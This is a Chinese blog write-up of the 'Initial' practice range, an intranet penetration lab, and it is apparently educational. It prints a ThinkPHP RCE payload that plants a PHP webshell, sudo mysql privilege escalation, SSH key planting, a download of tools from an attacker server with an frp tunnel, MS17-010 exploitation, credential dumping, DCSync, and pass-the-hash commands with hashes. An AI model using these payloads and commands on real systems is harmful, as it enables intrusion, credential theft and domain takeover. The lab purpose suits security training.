春秋云镜-Initial-Writeup

已于 2023-07-12 13:28:10 修改
阅读量1.5k 收藏 6
点赞数 3
分类专栏: # 仿真场景-专业徽章 文章标签: web安全 网络安全 安全
于 2023-07-11 18:02:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35607078/article/details/131666152
版权

靶标介绍:

Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。

payload:

http://39.xx.xx.xx/index.php?s=captcha

POST:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '%3C%3Fphp+%40eval%28%24_POST%5B1%5D%29%3B%3F%3E' >1231.php

此时已写入成功

拿到权限进行主机信息收集

运行

curl ip.sb


发现目标出网 ,准备反弹shell

去 https://www.revshells.com/ 生成下反弹shell

反弹成功

sudo -l 查看到 可以 NOPASSWD执行 mysql
mysql是可以执行系统命令的,我们可以用此方法提权到root

 sudo /usr/bin/mysql -e '\! bash -i'


 cat /root/flag/flag01.txt

于是便拿到了第一个flag

flag01: flag{60b53231-

netstat -ntpl发现目标开启了ssh
于是我们可以在不修改ssh密码的情况下 写入公钥进行远程ssh

生成rsa密钥

ssh-keygen -t rsa

于是将生成id_rsa.pub写入到目标.ssh目录下并命名为authorized_keys

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC09OeRl9NEQd/QfCp6aYdQN8wBXJxfZT93KHLaHkA5QghDSYnIzLtQROGZNmRaqyd3hasL0hIC9GKxsaC8JLo0ntUe7RQRyfDGnO00j6V7eqi7kzHgxg0Kjpuz5O0wtbmQz6Ibr7KquI0y/770OE1Ma68aTNXxhDY3/zoji5BnBSre+JvPrNiQlJW2fS6MjAz3xZ4T/cJ55LEIQHoJrsUx1xzu6dzlnYlWwPQsh9Ca59xzpecRagkVxCLX2q6fU6edh7M0sP11XT+lqPye0J/x7jN9ChY70BjZrAYsP2CmmU93yHWrV7sT2yBfpq5QPBTjyz/N+D7xLi8ZKEO4jzWS1E0ll0DOvwrKS11+g6Jfx3bPINOoteUcCM0wLl58drov91PIlRlPD5q1e/j5ngfKYZ4gUSzFgXxMQySa7D8zqX5w9OpxeYO2Og2uE6eYGE7Y7a9inaRvI2dfcPpa8YlMhz+wvJ5yKM9oewFCz9qaS6KWBVmdoxtCEFakbGRvT6c= ubuntu@VM-20-4-ubuntu' >>authorized_keys

成功的登录

wget https://github.com/shadow1ng/fscan/releases/download/1.8.2/fscan_amd64 -O fscan

下载fscan进行内网扫描

start infoscan
(icmp) Target 172.22.1.15     is alive
(icmp) Target 172.22.1.2      is alive
(icmp) Target 172.22.1.18     is alive
(icmp) Target 172.22.1.21     is alive
[*] Icmp alive hosts len is: 4
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.18:3306 open
172.22.1.2:88 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
[*] alive ports len is: 14
start vulscan
[*] NetInfo:
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] NetInfo:
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] NetInfo:
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetBios: 172.22.1.2      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[+] 172.22.1.21 MS17-010        (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios: 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600
[*] WebTitle: http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

使用frp代理 搭建socks5隧道进入内网
项目地址:https://github.com/fatedier/frp
client-frpc.ini:

[common]
server_addr = 175.xxx.xxx.xxx
server_port = 7000


[socks_proxy]
type = tcp
remote_port =8886
plugin = socks5

server-frps.ini:

[common]
bind_port = 7000

公网上用python开启服务器
python3 -m http.server 8081
用wget传入 目标

wget 175.xx.xx.xx:8081/frpc
wget 175.xx.xx.xx:8081/frpc.ini
chmod +x frpc
./frpc -c ./frpc.ini

server 端

 ./frps -c ./frps.ini

下载代理工具准备连入目标内网
我这里用的是Proxifier
Proxifier官网:https://www.proxifier.com/

代理规则就按他目标的网卡填

根据上面扫到的内容
有个ms17-010
我们先看这个
代理搭建好后可以直接在本地使用msf进行攻击
这里一定要注意

set payload windows/x64/meterpreter/bind_tcp

因为我的攻击端不在公网在内网,无法反弹,只能使用bind去连接
利用成功

抓密码

load kiwi
creds_all


msv credentials
===============

Username        Domain    NTLM                              SHA1
--------        ------    ----                              ----
XIAORANG-WIN7$  XIAORANG  a6c523c572328ef6e6774897553e267d  aef8b7c819cf76cc1f1378ac6d766705ad7666fa

本机上有个域内机器账户
也是说system权限,具备访问域控的能力
bloodhound进行域内信息收集
上传 SharpHound.exe

SharpHound.exe -c all

收集信息

收集完成之后会生成到本地

download C:/20230711170201_BloodHound.zip

上传后打开我们可以看到这台 WIN7是有权限DCSync的

比较巧的是打进去的win7就是这台

ipconfig /all拿到 domain域名
xiaorang.lab

使用

kiwi_cmd lsadump::dcsync /all /csv

即可dump所有用户hash

使用wmiexec访问 域控

impacket-wmiexec      xiaorang.lab/administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8

拿到了第三个flag

flag03: e8f88d0d43d6}

内网还一个信呼OA
可以从web打进去,也可以直接用我们获取到的管理员hash进行登录

impacket-wmiexec      xiaorang.lab/administrator@172.22.1.18 -hashes :10cf89a850fb1cdbe6bb432b859164c8


拿下第二个flag

flag02: 2ce3-4813-87d4-

域内也就这三个,拼接之后如下

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

紧接着我们继续来看看信呼的web怎么打

弱口令直接进入后台
admin
admin123
找一处地方上传

获取他的id

上传之后留意他的id以及他的filepath

先生成缓存
http://172.22.1.18/task.php?m=qcloudCos|runt&a=run&fileid={id}
然后在访问
http://172.22.1.18/{filepath}.php即可RCE

这个web还一个打法是phpmyadmin
访问路径/phpmyadmin
账号密码 root root
就是最基础的phpmyamin 日志 getshell
绝对路径可以通过信呼拿到

http://172.22.1.18/?p=basejm_

方法很多,较为基础,这里就不展开讲解了

Initial靶场(thinkphp漏洞、内网隧道、mysql写webshell)
墨痕诉清风的博客
03-14 353
DCSync(域控制器同步)攻击利用的是域控制器之间的数据同步复制机制。172.22.1.15就不用看了,172.22.1.21是个存在永恒之蓝的Win7,172.22.1.18是个信呼OA的系统,172.22.1.2是个域控。拿到所有用户的hash,172.22.1.2 的 445 端口开放,利用 smb 哈希传递,直接用 kali 自带的 crackmapexec攻击。回显出来的就是写进去一句话木马的路径,访问路径就可以执行命令,然后在蚁剑上配置一下代理,如果不配的代理话蚁剑也是没法直接访问到内网的。
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
春秋境—Initial
龙狼刺的博客
07-15 2352
Initial一套难度简单靶场环境完成挑战可以帮助玩家初步认识内网渗透简单流程。该靶场只有一个flag,各部分位于不同的机器上。在DCSync技术没有出现之前,攻击者要想拿到域内用户的hash,就只能在域控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash,但是在2015 年 8 月份, Mimkatz新增了一个主要功能叫"DCSync",使用这项技术可以有效地 “模拟” 域控制器并从目标域控上请求域内用户密码hash。
春秋靶场Initial-WriteUP 专业徽章手把手教学
qq_45234543的博客
11-17 4692
春秋靶场Initial-WP,专业徽章,完整flag获取教程
春秋-【仿真场景】Initial writeup
渗透测试研究中心
03-07 1371
开启靶机后是一个带着 ThinkPHP icon 的登陆界面,直接测试一下存在 5.0.23 RCE打一下,PHP-7.4.3 的环境,看一下 disable_functionspcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifco...
春秋initial
ULGANOY的博客
08-30 1997
春秋initial的record
春秋Initial WP
m0_62466350的博客
12-05 1695
Initial一套难度简单靶场环境完成挑战可以帮助玩家初步认识内网渗透简单流程。该靶场只有一个flag,各部分位于不同的机器上。1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)[外链图片转存中…(img-SvBaevSt-1701756474326)]1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)
IceCTF - Intercepted Conversations Pt.2 WriteUp
ShadowySpirits的博客
09-04 1277
追踪 Protocol 为 IRC 的流,可以得到一段聊天内容 大意是传输了一个 encode.pyc 文件,并用其加密了一段文字,密文如下: Wmkvw680HDzDqMK6UBXChDXCtC7CosKmw7R9w7JLwr/CoT44UcKNwp7DllpPwo3DtsOID8OPTcOWwrzDpi3CtMOKw4PColrCpXUYRhXChMK9w6PDhxfDicOdwoAg...
web安全Wargame—Natas解题思路(1-26)
xiaoi123的博客
08-29 1183
前言:   Natas是一个教授服务器端Web安全基础知识的 wargame,通过在每一关寻找Web安全漏洞,来获取通往下一关的秘钥,适合新手入门Web安全。 传送门~ 接下来给大家分享一下,1-20题的WriteUp。Natas0: 提示密码就在本页,右键查看源码,注释中发现key Key:gtVrDuiDfck831PqWsLEZy5gyDz1clto 知识点:查看页面源码 Na...
春秋Initial
m0_45155797的博客
02-14 919
Initial一套难度简单靶场环境完成挑战可以帮助玩家初步认识内网渗透简单流程。该靶场只有一个flag,各部分位于不同的机器上。
i春秋Initial
weixin_65550121的博客
12-15 718
参考文章:https://blog.csdn.net/solitudi/article/details/118675321。flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6} 最终flag。紧接着在fscan中可以看到存在一个ms17-010的机器,也就是172.22.1.21。通过Fscan进行扫描发现存在Thinkphp RCE漏洞。我们进行getshell之后通过蚁剑进行连接。紧接着通过MSF打MS17-010。然后我们通过蚁剑挂代理进行连接。
[春秋境]Initial
weixin_73307794的博客
08-06 457
春秋境!启动!
内网渗透春秋Intitle WP
Sapphire037的博客
04-23 2776
第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私信或评论,接下来会持续更新。
内网渗透】最保姆级的春秋Initial打靶笔记
uuzeray的博客
08-20 1963
永恒之蓝打了之后本身就是SYSTEM权限,可以mimikatz搜集域内用户hash。在打DC前先打172.22.1.21 MS17-010永恒之蓝。拿到第一个flag,提示下一个flag在内网服务器。先上传或者wget下载frpc和frpc.ini。suid没有可利用的提权命令,打sudo提权。再用crackmapexec打PTH拿下域控。172.22.1.18 信呼OA系统。先给msf所在机配一下socks5代理。这个一般直接拿kali的msf打就行。然后就能直接浏览器里访问内网服务。
靶场练习--春秋-Certify
NoooEmotion的博客
01-28 2254
Certify是一套难度为中等的靶场环境完成挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
春秋-Delegation-Writeup
qq_35607078的博客
08-14 1026
春秋-Delegation-Writeup
[春秋]CVE-2021-40282靶场
niubi707的博客
12-04 5753
CVE-2021-40282靶场通关记录
内网渗透】最保姆级的春秋Tsclient打靶笔记
uuzeray的博客
08-22 1311
提示STATUS_PASSWORD_EXPIRED也就是密码过期了,需要使用smbpasswd进行修改密码。172.22.8.46不出网,用172.22.8.18转发上线CS。测出来只有172.22.8.46可以连接。有在线用户可以用CS注入进程上线。上传SweetPotato提权。拿到一套账密,并提示打映像劫持。用PTH打DC,读到flag3。上传fscan和frp相关。致敬经典,选择用放大提权。sqlsever权限很低。用John查看共享资源。成功以SYSTEM上线。
Pikachu靶场全级别通关教程详解
热门推荐
weixin_52385170的博客
12-02 4万+
Pikachu靶场通关教程,超详细,欢迎评论区留言,一起进步
Initial 春秋
最新发布
03-21
春秋境是一个与计算相关的平台或服务,可能涉及虚拟化、容器化或其他IT基础设施管理功能。以下是关于如何初始化和配置此类系统的常见方法: --- ### 方法一:通过官方文档完成初始化 大多数服务平台都会提供详细的官方文档来指导用户完成初始化过程。可以访问春秋境的官方网站或者相关技术支持页面,查找最新的安装指南和配置教程。 例如,在初始化过程中通常包括以下几个关键步骤: - 下载并安装所需的客户端软件或命令行工具。 - 创建账户并登录系统控制台。 - 设置初始密码和其他安全选项。 --- ### 方法二:使用默认模板快速部署 许多现代平台支持一键式初始化流程,可以通过预定义的模板实现基础架构的自动配置。对于春秋境而言,这可能意味着选择一个适合业务需求的基础像或实例类型,并应用推荐的最佳实践设置。 具体操作如下: - 登录到端管理界面。 - 寻找“快速启动”或类似的功能入口点。 - 根据提示填写必要的参数值,比如区域位置、资源规模等信息。 --- ### 方法三:编写脚本来自动化复杂场景下的配置工作 当面对更高级别的定制需求时,则需要借助编程手段来进行精细化调整。此时可以考虑采用Shell脚本或者其他高级语言(如Python)结合API接口调用来达成目标。 下面给出一段简单的伪代码示例用于演示目的: ```bash #!/bin/bash # 定义变量 CLOUD_URL="https://example.com/api" TOKEN=$(curl -X POST "$CLOUD_URL/auth" --data '{"username":"admin","password":"secret"}' | jq -r '.token') # 发送请求创建新项目 PROJECT_ID=$(curl -H "Authorization: Bearer $TOKEN" \ -d '{"name": "my-first-project", "description": "Test project for demo purposes."}' \ -X POST "${CLOUD_URL}/projects" | jq -r '.id') echo Project ID is ${PROJECT_ID} ``` --- ### 注意事项 无论采取哪种方式进行初始化和配置,请务必关注数据隐私保护以及合规性要求。此外还应定期检查更新日志确保所使用的版本始终处于最新状态从而获得最佳性能表现同时减少潜在风险隐患。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值